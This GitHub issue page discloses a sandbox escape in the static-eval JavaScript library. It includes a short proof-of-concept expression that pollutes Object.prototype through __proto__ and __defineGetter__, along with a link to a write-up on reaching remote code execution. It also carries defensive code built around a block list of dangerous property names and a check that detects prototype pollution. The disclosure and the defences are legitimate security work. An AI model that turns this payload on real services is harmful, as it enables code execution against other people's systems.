browserify / static-eval

evaluate statically-analyzable expressions
MIT License

Sandbox Escape #32

Open po6ix opened 4 years ago

po6ix commented 4 years ago

PoC

```js
// make pollution
const evaluate = require('static-eval');
const parse = require('esprima').parse;

// The expression reaches Object.prototype through `__proto__` on a literal and
// installs Object (the literal's `constructor`) as a getter for `toString`.
var src = `({})['__proto__']['__defineGetter__']('toString', ({})['constructor'])`;
var ast = parse(src).body[0].expression;

evaluate(ast);

// serve webapp
const express = require('express');
const app = express();

app.get('/', (req, res) => {
    res.end('working!');
});

app.listen(8080);
```

details in https://blog.p6.is/bypassing-a-js-sandbox/#Prototype-Pollution-to-Remote-Code-Execution
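The PoC above escapes by walking a member chain from a plain object literal to `Object.prototype` and then altering a shared property. The following is an added example written for this thread; it is not code from the issue author or from the static-eval project, and every name in it (`safeGet`, `safePath`, `BLOCKED_KEYS`, `snapshotPrototypes`, `detectPollution`) is an assumption of this illustration rather than anything static-eval exposes. It shows the two defensive pieces a maintainer or integrator would want: a guarded member access that refuses the property names the expression relies on and only returns own, non-function properties, and a prototype snapshot/diff that reports when `Object.prototype`, `Array.prototype` or `Function.prototype` gained a property or had a data property turned into an accessor, which is exactly what `__defineGetter__('toString', ...)` does.

```javascript
'use strict';

// Property names through which a member expression climbs from a plain object to
// Object.prototype, to a constructor, or to the legacy accessor helpers used in the PoC.
// (Hypothetical allow/deny policy for this example, not static-eval's own.)
const BLOCKED_KEYS = new Set([
  '__proto__', 'constructor', 'prototype',
  '__defineGetter__', '__defineSetter__', '__lookupGetter__', '__lookupSetter__',
]);

// Guarded member access: what a sandboxed evaluator can use in place of a bare obj[key].
// Only own, non-function properties of non-null objects are reachable.
function safeGet(obj, key) {
  if (obj === null || typeof obj !== 'object') {
    throw new Error('member access on a non-object value');
  }
  if (typeof key !== 'string' || BLOCKED_KEYS.has(key)) {
    throw new Error(`blocked property name: ${String(key)}`);
  }
  if (!Object.prototype.hasOwnProperty.call(obj, key)) {
    // Inherited names such as toString or hasOwnProperty stop here.
    throw new Error(`not an own property: ${key}`);
  }
  const value = obj[key];
  if (typeof value === 'function') {
    throw new Error(`refusing to expose a function: ${key}`);
  }
  return value;
}

// Resolve a dotted path such as "user.profile.name" with safeGet at every step.
function safePath(root, path) {
  return path.split('.').reduce((current, key) => safeGet(current, key), root);
}

// Shared prototypes an escaped expression is most likely to modify.
const WATCHED = {
  Object: Object.prototype,
  Array: Array.prototype,
  Function: Function.prototype,
};

function propertyKind(desc) {
  return (desc.get || desc.set) ? 'accessor' : 'data';
}

// Record every own key of the watched prototypes together with its kind
// ('data' or 'accessor'), so a later diff also catches a data property that was
// converted into a getter, as the PoC does to Object.prototype.toString.
function snapshotPrototypes() {
  const snapshot = {};
  for (const [name, proto] of Object.entries(WATCHED)) {
    snapshot[name] = new Map();
    for (const key of Reflect.ownKeys(proto)) {
      const desc = Object.getOwnPropertyDescriptor(proto, key);
      snapshot[name].set(String(key), propertyKind(desc));
    }
  }
  return snapshot;
}

// Diff the live prototypes against a snapshot; returns readable findings,
// an empty array when nothing changed.
function detectPollution(snapshot) {
  const findings = [];
  for (const [name, proto] of Object.entries(WATCHED)) {
    for (const key of Reflect.ownKeys(proto)) {
      const kind = propertyKind(Object.getOwnPropertyDescriptor(proto, key));
      const label = `${name}.${String(key)}`;
      const previous = snapshot[name].get(String(key));
      if (previous === undefined) {
        findings.push(`${label} (added, ${kind})`);
      } else if (previous !== kind) {
        findings.push(`${label} (changed to ${kind})`);
      }
    }
  }
  return findings;
}

// Constructed demonstration: install a harmless getter on Object.prototype the way
// the PoC installs one for toString, confirm the diff reports it, then remove it.
function demoPollutionDetection() {
  const before = snapshotPrototypes();
  Object.defineProperty(Object.prototype, 'pollutedMarker', {
    get() { return 1; },
    configurable: true,
  });
  const findings = detectPollution(before);
  delete Object.prototype.pollutedMarker;
  return findings;
}
```

Running an evaluator with `safeGet` in place of `obj[key]` makes the PoC fail at its first step, because `__proto__` is refused before any prototype is reached, while ordinary data lookups such as `safePath(ctx, 'user.name')` still work. The snapshot/diff pair is the runtime check for a service that cannot avoid evaluating expressions: take a snapshot at startup and compare after each evaluation (or periodically), treating any finding as a sandbox escape worth alerting on, since legitimate code has no reason to add or reshape properties on these prototypes.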

goto-bus-stop commented 4 years ago

Thanks for the report! As the readme says, we don't encourage people to use static-eval on untrusted input because of things like this; there are probably many more undiscovered ways too :sweat_smile:

I'll see if there is a simple fix for this, anyway, but it's not the highest priority.